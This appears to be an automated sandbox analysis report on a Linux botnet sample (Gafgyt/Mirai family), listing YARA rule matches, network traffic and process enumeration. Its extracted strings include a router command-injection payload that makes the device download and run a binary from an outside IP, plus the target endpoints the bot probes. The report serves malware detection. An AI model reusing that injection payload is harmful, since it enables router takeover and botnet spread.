          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
          Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
          Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
          Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
          Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
          Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443

          System Summary

          barindex
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: Process Memory Space: skyljnee.x86_64-20240128-0910.elf PID: 6233, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodercundi/var/cundi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverPOST /goform/set_LimitClient_cfg HTTP/1.1
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: skyljnee.x86_64-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: 6233.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: Process Memory Space: skyljnee.x86_64-20240128-0910.elf PID: 6233, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: classification engineClassification label: mal100.troj.linELF@0/0@1/0
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/6234/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/6236/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/6235/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/1582/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/3088/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/230/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/110/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/231/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/111/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/232/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/1579/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/112/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/233/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/1699/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/113/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/234/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/1335/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/1698/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/114/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/235/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/1334/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/1576/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/2302/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/115/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/236/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/116/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/237/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/117/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/118/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/910/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/119/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/912/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/10/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/2307/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/11/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/918/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/6241/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/12/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/6240/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/13/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/14/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/15/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/16/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/17/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/18/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/1594/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/120/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/121/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/1349/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/1/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/122/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/243/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/123/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/2/cmdlineJump to behavior
          Source: /tmp/skyljnee.x86_64-20240128-0910.elf (PID: 6236)File opened: /proc/124/cmdlineJump to behavior
